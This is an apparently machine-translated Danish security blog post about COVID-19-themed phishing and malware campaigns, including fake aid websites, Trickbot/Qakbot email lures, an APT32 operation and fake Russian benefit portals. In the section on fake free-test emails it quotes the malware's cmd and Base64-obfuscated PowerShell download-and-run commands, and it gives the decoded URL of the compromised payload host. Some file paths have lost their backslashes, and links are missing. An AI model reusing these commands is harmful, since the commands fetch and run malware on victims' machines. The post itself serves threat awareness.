Angribere fortsætter med at udnytte COVID-19-emnet og skaber flere og flere trusler for brugere, der er meget interesserede i alt relateret til epidemien. I Vi har allerede talt om, hvilke typer malware der dukkede op i kølvandet på coronavirus, og i dag vil vi tale om social engineering-teknikker, som brugere i forskellige lande, herunder Rusland, allerede har stødt på. Generelle tendenser og eksempler er under skæring.
Husk i Vi talte om, at folk er villige til ikke kun at læse om coronavirus og epidemiens forløb, men også om økonomiske støtteforanstaltninger? Her er et godt eksempel. Et interessant phishing-angreb blev opdaget i den tyske delstat Nordrhein-Westfalen eller NRW. Angriberne oprettede kopier af økonomiministeriets hjemmeside (), hvor alle kan søge om økonomisk hjælp. Sådan et program findes faktisk, og det viste sig at være gavnligt for svindlere. Efter at have modtaget de personlige data om deres ofre indgav de en ansøgning på det rigtige ministeriums hjemmeside, men angav andre bankoplysninger. Ifølge officielle data blev 4 tusind sådanne falske anmodninger fremsat, indtil ordningen blev opdaget. Som et resultat faldt 109 millioner dollars beregnet til berørte borgere i hænderne på svindlere.
Vil du have en gratis test for COVID-19?
Et andet væsentligt eksempel på phishing med coronavirus-tema var i e-mails. Beskederne tiltrak brugernes opmærksomhed med et tilbud om at gennemgå gratis test for coronavirus-infektion. I vedhæftningen af disse der var tilfælde af Trickbot/Qakbot/Qbot. Og da de, der ønskede at tjekke deres helbred, begyndte at "udfylde den vedhæftede formular", blev et ondsindet script downloadet til computeren. Og for at undgå sandboxing-testning begyndte scriptet først at downloade hovedvirussen efter et stykke tid, da beskyttelsessystemerne var overbevist om, at der ikke ville forekomme ondsindet aktivitet.
Det var også nemt at overbevise de fleste brugere om at aktivere makroer. For at gøre dette blev der brugt et standardtrick: For at udfylde spørgeskemaet skal du først aktivere makroer, hvilket betyder, at du skal køre et VBA-script.
Som du kan se, er VBA-scriptet specielt maskeret fra antivirus.
Windows har en ventefunktion, hvor applikationen venter /T <sekunder>, før den accepterer standardsvaret "Ja". I vores tilfælde ventede scriptet 65 sekunder, før de slettede midlertidige filer:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Og mens man ventede, blev malware downloadet. Et særligt PowerShell-script blev lanceret til dette:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Efter afkodning af Base64-værdien downloader PowerShell-scriptet bagdøren på den tidligere hackede webserver fra Tyskland:
http://automatischer-staubsauger.com/feature/777777.pngog gemmer det under navnet:
C:UsersPublictmpdirfile1.exe
Folder ‘C:UsersPublictmpdir’ slettes, når du kører 'tmps1.bat'-filen, der indeholder kommandoen cmd /c mkdir ""C:UsersPublictmpdir"".
Målrettet angreb på offentlige myndigheder
Derudover rapporterede FireEye-analytikere for nylig om et målrettet APT32-angreb rettet mod regeringsstrukturer i Wuhan, såvel som det kinesiske ministerium for beredskab. En af de distribuerede RTF'er indeholdt et link til en artikel i New York Times med titlen . Men efter at have læst den blev malware downloadet (FireEye-analytikere identificerede forekomsten som METALJACK).
Interessant nok opdagede ingen af antivirusserne denne instans på detektionstidspunktet, ifølge Virustotal.
Når officielle hjemmesider er nede
Det mest slående eksempel på et phishing-angreb fandt sted i Rusland forleden dag. Årsagen hertil var udpegelsen af en længe ventet ydelse til børn i alderen 3 til 16 år. Da starten på at acceptere ansøgninger blev annonceret den 12. maj 2020, skyndte millioner sig til statstjenestens websted for den længe ventede hjælp og bragte portalen ned, der ikke var værre end et professionelt DDoS-angreb. Da præsidenten sagde, at "Statens tjenester ikke kunne klare strømmen af ansøgninger", begyndte folk at tale online om lanceringen af et alternativt websted til at acceptere ansøgninger.
Problemet er, at flere websteder begyndte at arbejde på én gang, og mens en, den rigtige på posobie16.gosuslugi.ru, faktisk accepterer ansøgninger, mere .
Kolleger fra SearchInform fandt omkring 30 nye svigagtige domæner i .ru-zonen. Infosecurity og Softline Company har sporet mere end 70 lignende falske offentlige servicewebsteder siden begyndelsen af april. Deres skabere manipulerer velkendte symboler og bruger også kombinationer af ordene gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie og så videre.
Hype og social engineering
Alle disse eksempler bekræfter kun, at angribere med succes tjener penge på emnet coronavirus. Og jo højere den sociale spænding er og jo mere uklare spørgsmål, jo større chancer har svindlere for at stjæle vigtige data, tvinge folk til at opgive deres penge på egen hånd eller simpelthen hacke flere computere.
Og i betragtning af at pandemien har tvunget potentielt uforberedte mennesker til at arbejde hjemmefra i massevis, er ikke kun personlige, men også virksomhedsdata i fare. For eksempel blev brugere af Microsoft 365 (tidligere Office 365) for nylig også udsat for et phishing-angreb. Folk modtog massive "misste" talebeskeder som vedhæftede filer til breve. Filerne var dog faktisk en HTML-side, som sendte ofre for angrebet til . Som et resultat, tab af adgang og kompromittering af alle data fra kontoen.
Kilde: www.habr.com